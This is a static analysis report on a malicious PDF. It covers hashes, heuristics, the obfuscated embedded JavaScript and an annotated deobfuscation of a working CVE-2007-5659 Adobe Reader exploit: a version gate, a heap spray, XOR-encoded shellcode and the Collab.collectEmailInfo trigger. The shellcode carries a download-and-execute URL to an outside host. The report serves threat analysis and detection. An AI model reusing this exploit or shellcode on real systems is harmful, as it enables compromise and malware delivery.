Malicious PDF — malware analysis report

Static analysis result for SHA-256 891971f66e69730d…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) — note that /CreationDate and /Producer are self-reported by the file and trivially forgeable; treat them as context, not evidence. First seen: 2026-05-08
MD5: 50b0181fdaed2a9f3b1ddd7b626b3bab SHA-1: 01e841393d95933fb2920532b3865f41ad11a1bc SHA-256: 891971f66e69730d9f2089ed12469bb3359ff459c7f098bc133cb4045cc7a3dd
290 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 in Adobe Reader. The recovered stage first checks app.viewerVersion and only fires on Reader 8.0.x, 8.1.0–8.1.1, 7.0.x and anything below 7 — i.e. builds without the 8.1.2 fix — so detonating the sample on a patched Reader will show no malicious behaviour. It then heap-sprays roughly 48 blocks of 4 MB (NOP sled plus shellcode) so that address 0x0c0c0c0c lands in attacker-controlled memory, and calls Collab.collectEmailInfo() with an oversized msg argument made of 0x0c bytes to trigger the overflow. The shellcode carries the URL http://abb192.cn/spl3/load.php?id=331&spl=4 as little-endian %u escapes at its tail; together with the download-and-execute pattern flagged below, it is very likely the second-stage payload fetch, and the domain should be treated as a network IOC. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader/Acrobat (fixed in 8.1.2) triggered by an over-long msg argument passed to Collab.collectEmailInfo(), typically paired with a heap spray so the overwritten pointer lands in attacker-controlled memory. Part of a series of Acrobat JS API exploits. In this sample the call is preceded by a version gate that admits exactly the unpatched builds, which corroborates the match. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl3/load.php?id=331&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x367 6342 bytes
SHA-256: 3e4669ceff278116a436790fdbfdd40d183f5e111afe78e0fd976c8d2282ff51
Detection
ClamAV: No threats found (a single signature engine missing a per-sample obfuscated stage is expected; this is not evidence of benignity)
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function XiVJY2Fik(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function aDwmV0OiP(FRGxfiO7L){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(FRGxfiO7L)"+";"+"}");eval("function CJbdQfE9(tuL1dtZSI){var WaocK7Zf="+"0,rkwsYNDKDzj=tuL1dtZSI.l"+"en"+"gth,H4QyT7Db=10"+"2"+"4,XWUgAOGcg9F,R91RL,KL5Vg8web3s='',DXjgEu=WaocK7Zf,OXkdmCiuCA=WaocK7Zf,RqccLIjHxL=WaocK7Zf,aYWNHCcCG8j2k=Ar"+"ra"+"y(63,54,40,39,43,10,46,34,21,18,0,0,0,0,0,0,30,23,5,59,32,33,27,13,16,28,61,48,36,58,3,19,15,14,7,62,0,17,55,42,8,47,24,0,0,0,0,29,0,25,49,51,37,38,31,45,20,35,22,12,56,60,26,57,53,50,9,4,2,1,52,11,44,6,41);f"+"o"+"r(R91RL=M"+"at"+"h.c"+"ei"+"l(rkwsYNDKDzj/"+"H4QyT7Db)"+";R91RL>WaocK7Zf;R91RL-"+"-){fo"+"r(XWUgAOGcg9F=Ma"+"th.m"+"in(rkwsYNDKDzj,H4QyT7Db);XWUgAOGcg9F>WaocK7Zf;XWUgAOGcg9F-"+"-,rkwsYNDKDzj-"+"-){RqccLIjHxL|"+"=(aYWNHCcCG8j2k[tuL1dtZSI.cha"+"rCod"+"eAt(DXjgEu+"+"+)-48])<"+"<OXkdmCiuCA;if(OXkdmCiuCA){KL5Vg8web3s+"+"=aDwmV0OiP"+"(157^RqccLIjHxL&"+"2"+"5"+"5);RqccLIjHxL>"+">="+"8;OXkdmCiuCA-"+"="+"2;}el"+"se{OXkdmCiuCA="+"6"+";}}"+"}return (KL5Vg8web3s);}var 
YSRRchy=implode('',['J6Q0Y','VCSU0g','W','G4Pb4jYvZfICJtnYciYMJ','qJ','CYc','Pop94','zJ6P','McCfMvw','0mJ','Sm','CUCgp','XAwb@V','@zbc','SvX0f','CO4Q4b1','C','vpCMc9','cmSdOFYeV4M','pOfmlVFgsC_CdyPCOim0g','PgMxQFmlPYSzA0gYyMvpCMc9cm','SdO','4os','C_C','dyPCOim0gPgMx14gD1wb','@V@zbcSv','X0','fCO4Q4et@YsC_CdyPCOim','0g','PgMx1w2J9x','VgAnmxP','Gq0','VSvWcMx6','iS063SCvPYSp1','nxO','AY4Pw','GcCA6xY94zJS','QS','z','iSCcVwb@V','@zbcS','v','X0fCO4Q','4','e1wl','J6PMcCfM','vw0mJ','6PWL','S','Y','1Q4','n','g','v14oJ6','Q0YVF','SA0mv29_mJtnYgj@4S','VW','0gMf4SFnY4c0CJ@P0WcS0GCGp','Pif','J6f_YD1wMciYCScfClACYl','7@W6eW4l7@W6eW4l7@W6eW4l7@4FiJV','l7','6467MVl7SW','4','MGz','l7@','zgSGzl','7@z','g154l7','Q','1FCW4l7Q1YeW4l7Q1fYGVl7Q1d1','5Wl7','S1','Fi','gVl7S','1','F','YJ','1l','7@','zf4','M','1l7@1F','351l','7Q1FiJ1l7SW','z7J1l','7','Q16qJ1l7QzFYn','Wl7@W','Y6g4l','7','QzFYn','Wl7','SWZigWl7Q1','FVW4l7Q1FiJVl7SWz','7J1l7SVL','1W4l7SWx','jWWl7Q1xqG4l7','@4W1','W4l7Q1','F','c','54l7Q1F','iJ','1l7QVIYMWl7SVL7JVl76W','W','jWWl','7SW2q54l','7@4','W','7G4l7Q1FcM1l7Q1','F','iJ1l7QVIYMWl7SVL7gWl76','VIAWWl7Q4g7M1l','7@4WSn1l7Q1FVn1l7Q1FiJ1l','7QV','I','YM','Wl','7','S','V','L7g4l7@4gjWWl7@4F05','4l7@','4W','jM1l7Q1F','CMVl7Q1FiJ1l7QV','IYM','Wl7S','VL6J','1l7S4ZA','WWl7','@','4','IO','MWl7@4W','7','WWl7','Q1F05zl7Q1FiJ1l7QVI','YMWl7','QV','FY','JVl7@1','W','6','M1l7QzI0WVl7SW4q5W','l','7S1WqGV','l7Q1d1','M','Wl7','Q1F','iG1l7SVx7J1l7','QzIYM','Wl7SWzMJVl7Q','1','f','cG','Vl7','Q','1ZA5Wl','7SWzSJWl7S1WSGVl7@4','W','SGzl7Q1FYn','Wl7Q1','F','iJ1','l7','@zWSJ1l','7S12eG','zl7QzFC_4l','76Wd1WWl7Q','1FiJ','1l','7S','W4','7J1l7S16qGVl','7S4I','YnWl','7S4FY','WVl7SW4','SJ','1','l76VFcGVl7','Q4','gjWWl7Q1Fi','J1l7SV','FiJ1l7QVI','Yn','W','l7@z26JVl','7','S','V47_1l7SVIYnWl7@4','W','6gWl7Q1','FA','51l7Q','1Fi','J1l7','QVIigVl7S4dMJ1l7S','V','67','J1','l76V','x954l7S4dj5V','l7Q1f','cJ1l7','@zIO','WWl7Q1F','iJ1l7QzIcn4l7SWzMJ1l','7Q16qGVl7Q1','ZA5','Wl7SWzSJ','Wl','7','S1','WSGVl7QVFV','WWl7Q',
'1FiJ1l7@z27','J1l7S','VW7_zl7QVIigVl7@1@C','J','Vl7','SV@CnW','l7Q','4gSgV','l76VFO5Vl7','SV@0','J1','l7QV','IYnWl7@z','26g4l7','SV','4','7GVl7SVIYnWl7@4W','6gWl7','Q1','FCgVl7Q','1FiJ1l7','Q1F','A5Wl7Q','zI','cn4l7SW','zM','J','1','l7Q','1Wq','GVl7Q1a','A5Wl7S','W','z','SJW','l7S1WSG','Vl','7S1FVWW','l7Q1FiJ1l7@z27','J1l7','SWzqn4','l7S1FcGVl','7Q1ZA','5Wl','7SWzSJWl7','S1W','SGVl','7Q','1FVWWl7Q1','FiJ','1','l7QVZi','J1l7S','Va','0_Wl7@4ZigVl7@4Zi','g','Vl7@4ZigVl','7@4ZigVl7@4','66WV','l7S','V2','7JVl7SWzSgVl7@4aC5','Wl7SVacnzl7@4F','cn4l7SW','zSG','Vl7S','Wz','1W4','l7','Q1W9M4l7SVY6nWl7SVL7','g4l7Q','z@','YnWl7SWzeg4','l7S1x9MVl7Q','1@OWWl7','SVLqWVl7','QzL','6nWl7Q','1@','CJ1l7','@1','@cWV','l','7QV4SMWl7@W','YqG1l','7S4@igVl','7@1','@0Gz','l7Q','1gq5zl7S1Fi54l7Q4a3GWl7Q','1W9MVl','7S4xS51l7Q1@iJ','4','l7Q','VFcn1','l7Q4ZV','nWl7','Q4x','e_','W','l7QzI0G4l7S','V215V','l7@4','z6','nWl7','SV26nW','l7Q1','@CJVl7@zLMM4l7Q166nWl7S
... (truncated)
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x367 2574 bytes
SHA-256: 262aafd20d6fbcffff53698f820d3f52fcdba6faaabeae22f363834dd49f4121
Detection
ClamAV: No threats found (note: this is the fully decoded exploit stage — a signature miss here says nothing about the sample, whose verdict rests on the heuristics above)
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation: deobfuscated CVE-2007-5659 exploit stage recovered from PDF /JS object 13. Comments are ours; the code is the carved sample, unmodified. Do not run this outside an isolated sandbox — it targets the Acrobat JavaScript API (app, Collab) and will not execute under Node.
var fLB7PgY6hOEZp = new Array(); /* global array that keeps the sprayed heap blocks referenced (and therefore allocated) */ function RrLCKU(YCp8lqNUbpNw1, Nh3ROQfx) { /* pads a string by repeated doubling until its UTF-16 byte length (length*2) reaches Nh3ROQfx, then trims it to exactly Nh3ROQfx bytes — used to build the NOP sled */ while (YCp8lqNUbpNw1.length*2<Nh3ROQfx){YCp8lqNUbpNw1 += YCp8lqNUbpNw1;} YCp8lqNUbpNw1 = YCp8lqNUbpNw1.substring(0,Nh3ROQfx/2); return YCp8lqNUbpNw1; } function f59bGS7() { /* heap spray: fills the heap with ~48 blocks of 4 MB (0x400000) so that 0x0c0c0c0c falls inside a NOP sled that runs into the shellcode */ var dJRN5Il = 0x0c0c0c0c; /* target address; the overflow below overwrites a pointer with 0x0c bytes */ var jawqbPCIRehsJ = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3333%u2631%u7073%u3D6C%u0034"); /* x86 shellcode as little-endian %u escapes. The leading bytes (EB 0F / 5B 33 C9 66 B9 80 01 / 80 33 EF 43 E2 FA / EB 05 / E8 EC FF FF FF) appear to be a jmp-call-pop stub that XORs the following 0x180 bytes with 0xEF — the many %uEFEF words are encoded zeros. The unencoded tail %u7468...%u0034 decodes to "http://abb192.cn/spl3/load.php?id=331&spl=4" plus a NUL, the second-stage URL reported above */ var Gbzb3MgK = 0x400000; /* spray block size, 4 MB */ var PEiC6Jc = jawqbPCIRehsJ.length * 2; /* shellcode size in bytes */ var Nh3ROQfx = Gbzb3MgK - (PEiC6Jc+0x38); /* sled size = block minus shellcode minus 0x38 bytes (presumably string/heap header slack — not verifiable from here) */ var YCp8lqNUbpNw1 = unescape("%u9090%u9090"); /* x86 NOP (0x90) seed for the sled */ YCp8lqNUbpNw1 = RrLCKU(YCp8lqNUbpNw1, Nh3ROQfx); var C4vKwF16qkM = (dJRN5Il - 0x400000)/Gbzb3MgK; /* block count: (0x0c0c0c0c - 0x400000) / 0x400000 is about 47.2, so the loop runs 48 times (~190 MB) */ for (var lakGC1=0;lakGC1<C4vKwF16qkM;lakGC1++) { fLB7PgY6hOEZp[lakGC1] 
= YCp8lqNUbpNw1 + jawqbPCIRehsJ; } } function z6LM5xPRekZu() { /* version gate followed by the CVE-2007-5659 trigger */ var o75biMD = app.viewerVersion.toString(); /* Acrobat JS API: Reader version string, e.g. "8.1.1" */ o75biMD = o75biMD.replace(/\D/g,""); /* strip non-digits, e.g. "811" */ var IYiYYoPI = new Array(o75biMD.charAt(0),o75biMD.charAt(1),o75biMD.charAt(2)); /* [major, minor, patch] as single characters; the loose == and < below coerce them to numbers */ if ((IYiYYoPI[0] == 8 && ((IYiYYoPI[1] == 1 && IYiYYoPI[2] < 2) || IYiYYoPI[1] < 1)) || (IYiYYoPI[0] == 7 && IYiYYoPI[1] < 1) || (IYiYYoPI[0] < 7)) { /* fires only on 8.1.0-8.1.1, 8.0.x, 7.0.x and anything below 7 — the builds without the 8.1.2 fix; a patched Reader (or 7.1+) does nothing, so sandbox runs on patched versions show no behaviour */ f59bGS7(); var V4GnQKlqm = unescape("%u0c0c%u0c0c"); while(V4GnQKlqm.length < 44952) V4GnQKlqm += V4GnQKlqm; /* doubles a 0x0c-byte string until at least 44952 UTF-16 chars (ends at 65536 chars, 128 KB); each 4-byte group reads as the sprayed address 0x0c0c0c0c */ this.collabStore = Collab.collectEmailInfo({subj: "",msg: V4GnQKlqm}); /* CVE-2007-5659 trigger: the over-long msg overflows the buffer; the assignment to this.collabStore presumably only keeps the result referenced */ } } z6LM5xPRekZu(); /* top-level call — executes when Reader runs the document's JavaScript action */